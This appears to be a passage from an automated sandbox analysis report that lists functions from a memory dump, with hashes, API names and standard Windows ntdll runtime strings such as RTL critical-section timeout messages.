                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsnlen
                                                                                                                                                                                    • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                                                                                                                    • API String ID: 3628947076-1387797911
                                                                                                                                                                                    • Opcode ID: 17cbc8ee5c4eec1bf0166d076f608062996281c9a3e88e5b140adae611c06d5f
                                                                                                                                                                                    • Instruction ID: 9fd5fd6ab1aa20a63224dd830a60689777fa4b2a10afbf38ae4cb2aab99c99ff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 17cbc8ee5c4eec1bf0166d076f608062996281c9a3e88e5b140adae611c06d5f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2541937624034DBEEB019A90CC42FFE77ACEF04B44F158112BB05DA191DBB0DA54A7B6
                                                                                                                                                                                    Function 00DA13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                                                                    • Opcode ID: 6745dde291602608bf38379e4d6122a4a149f0167eb0eaaa02926f9ed3d5c099
                                                                                                                                                                                    • Instruction ID: 38734b4b035864539be80325c6182efac972c6fcb45bf58fe16cf366d38e5360
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6745dde291602608bf38379e4d6122a4a149f0167eb0eaaa02926f9ed3d5c099
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C6134B9904656AACF34CF9DC8908BEBBB5EF9A300B18C12DF4D647640D774AA40CB70
                                                                                                                                                                                    Function 00E03B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                                                                    • Opcode ID: 4c3facfdd658ba6657a1135ea5b89240f7ba228594c9f197df8a3e644a9541ad
                                                                                                                                                                                    • Instruction ID: d1791e1e404701db1e2600d5ce7b27c50ce975ff08eb2ccb229099046cc441bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c3facfdd658ba6657a1135ea5b89240f7ba228594c9f197df8a3e644a9541ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A619376900644AFDF24DF69C9804BEBBF9EF54314B14D52AF8A9B7181E234DB809B60
                                                                                                                                                                                    Function 00D97EFD Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 127COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00DB3F12
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Execute=1, xrefs: 00DB3F5E
                                                                                                                                                                                    • ExecuteOptions, xrefs: 00DB3F04
                                                                                                                                                                                    • 'i, xrefs: 00D97F1E
                                                                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00DB3F4A
                                                                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00DBE2FB
                                                                                                                                                                                    • Rw, xrefs: 00D97F08
                                                                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 00DBE345
                                                                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00DB3F75
                                                                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00DB3EC4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseDataModuleQuery
                                                                                                                                                                                    • String ID: Rw$CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$'i
                                                                                                                                                                                    • API String ID: 3901378454-972555932
                                                                                                                                                                                    • Opcode ID: ddba7a399336a99a0c6942f2501a88d1cd6a1ba90d68f59b9cf101c0aa62a325
                                                                                                                                                                                    • Instruction ID: 24d7aebb92513517e98abe8c9ee55f8f45d5835244a293b84c60225f66962221
                                                                                                                                                                                    • Opcode Fuzzy Hash: ddba7a399336a99a0c6942f2501a88d1cd6a1ba90d68f59b9cf101c0aa62a325
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15418571A8061CBBDF209E94DC86FEA73BCAF58700F0405A9B505F6191EA70DA499B71
                                                                                                                                                                                    Function 00DA0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __fassign
                                                                                                                                                                                    • String ID: .$:$:
                                                                                                                                                                                    • API String ID: 3965848254-2308638275
                                                                                                                                                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                    • Instruction ID: 62d4fb523e384cdefbba2d75617b5d101f0b7f371bdc0c7e19781c2a89c49889
                                                                                                                                                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 61A17C71D0030AEFDF24DF64C8456BEBBB5EF06314F28856AD852A7282D7349A41CBB1
                                                                                                                                                                                    Function 00DA0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DC2206
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                    • API String ID: 885266447-4236105082
                                                                                                                                                                                    • Opcode ID: 1bfdc6eda746bd708a7cb2fdb135ac73b063e86b9fbe52e311bd366de4f25499
                                                                                                                                                                                    • Instruction ID: 37b94fdffbc54cda5c30db5a500be16a900ffdffd81078c23f9c8180a17fed8e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bfdc6eda746bd708a7cb2fdb135ac73b063e86b9fbe52e311bd366de4f25499
                                                                                                                                                                                    • Instruction Fuzzy Hash: A7512871B002026FEB159A18CC81FB673A9EF99710F29422DFD45DB285DA71EC418BB4
                                                                                                                                                                                    Function 00DA14C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 00DCEA22
                                                                                                                                                                                      • Part of subcall function 00DA13CB: ___swprintf_l.LIBCMT ref: 00DA146B
                                                                                                                                                                                      • Part of subcall function 00DA13CB: ___swprintf_l.LIBCMT ref: 00DA1490
                                                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 00DA156D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: Rw$%%%u$]:%u
                                                                                                                                                                                    • API String ID: 48624451-914787948
                                                                                                                                                                                    • Opcode ID: 236f84a24b3be70e2ff2a3b19a4abd00bdd40fc9ea7c371a3b0383e1b86857c8
                                                                                                                                                                                    • Instruction ID: c56c91b53f4930d6db16644f1d8fddc803de21edb9053f98a787f19c709ecbd5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 236f84a24b3be70e2ff2a3b19a4abd00bdd40fc9ea7c371a3b0383e1b86857c8
                                                                                                                                                                                    • Instruction Fuzzy Hash: B4218F76D00219AFCF20DE58CC41AEAB3BCEB91710F484565F846E3141DB70EA598BF1
                                                                                                                                                                                    Function 00E03DA7 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 82COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: Rw$%%%u$]:%u
                                                                                                                                                                                    • API String ID: 48624451-914787948
                                                                                                                                                                                    • Opcode ID: f54ea4ba67c6067eac711a6306eb5efb397248bd24e9ba52158a51344ed67d97
                                                                                                                                                                                    • Instruction ID: 128ab80efc93106760f6ca52f20f4395f2e3267e68398a6eff941c44efb46a1b
                                                                                                                                                                                    • Opcode Fuzzy Hash: f54ea4ba67c6067eac711a6306eb5efb397248bd24e9ba52158a51344ed67d97
                                                                                                                                                                                    • Instruction Fuzzy Hash: F021AFB690021AABCB20AE79CD459EF77ACDB14758F041625FC08F3281E7749E99C7E1
                                                                                                                                                                                    Function 00D853A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DC22F4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00DC22FC
                                                                                                                                                                                    • RTL: Re-Waiting, xrefs: 00DC2328
                                                                                                                                                                                    • RTL: Resource at %p, xrefs: 00DC230B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                    • API String ID: 885266447-871070163
                                                                                                                                                                                    • Opcode ID: 8d836a0c72430c957369b518a1204147e7e23695cff11b80fb583054b749e198
                                                                                                                                                                                    • Instruction ID: 42b55c47ea5752ccfc38324e16beb89e614f734b03c5d6c88ff9e5dd865801f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d836a0c72430c957369b518a1204147e7e23695cff11b80fb583054b749e198
                                                                                                                                                                                    • Instruction Fuzzy Hash: 765127716007026BDF11EB28DC81FA77399EF59360F104229FD49DB285EA71ED418BB0
                                                                                                                                                                                    Function 00D8EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00DC24BD
                                                                                                                                                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00DC248D
                                                                                                                                                                                    • RTL: Re-Waiting, xrefs: 00DC24FA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                                    • API String ID: 0-3177188983
                                                                                                                                                                                    • Opcode ID: 50d56dae303784b0b1b2fa34b98b54d96a4216e3d2055f9ec06f26be768cb466
                                                                                                                                                                                    • Instruction ID: 6a2dcc4e5ac5259c40fe7e7760ee13b4ecbc7d0edbea874ef36f028d1c092559
                                                                                                                                                                                    • Opcode Fuzzy Hash: 50d56dae303784b0b1b2fa34b98b54d96a4216e3d2055f9ec06f26be768cb466
                                                                                                                                                                                    • Instruction Fuzzy Hash: E041D570A04205AFD724EBA8CC85FBB77A9EF49720F248609F9559B2C1D734E9418B70
                                                                                                                                                                                    Function 00D9FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __fassign
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3965848254-0
                                                                                                                                                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                    • Instruction ID: 4c849bf8a8d8c4f9493bea30df75ce562241401910e736daeb16ede34523b698
                                                                                                                                                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                    • Instruction Fuzzy Hash: E2917E71D0420AEBDF24DF98C845AEEB7B4EF55315F28807AE451E71A2E7309A41CBB1
                                                                                                                                                                                    Function 00E15CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                                                                    • String ID: $$0
                                                                                                                                                                                    • API String ID: 1302938615-389342756
                                                                                                                                                                                    • Opcode ID: bd7b6151f8803b91c489f00b9c211ecce3a41b9a7e270e2f9bc1f781265c2d88
                                                                                                                                                                                    • Instruction ID: 5bc71b3ef7b4128e3e8330158209cffd3c39ea3dd0bfb2012ee7b34d770bc87e
                                                                                                                                                                                    • Opcode Fuzzy Hash: bd7b6151f8803b91c489f00b9c211ecce3a41b9a7e270e2f9bc1f781265c2d88
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7591B032D04A8ADFDF24CFA9D8453EEBBB1AF85314F14665AD4A1B7291C3744AC2CB50
                                                                                                                                                                                    Function 00D9FE4F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00D9FED6: ___swprintf_l.LIBCMT ref: 00D9FEFD
                                                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 00DCEA87
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
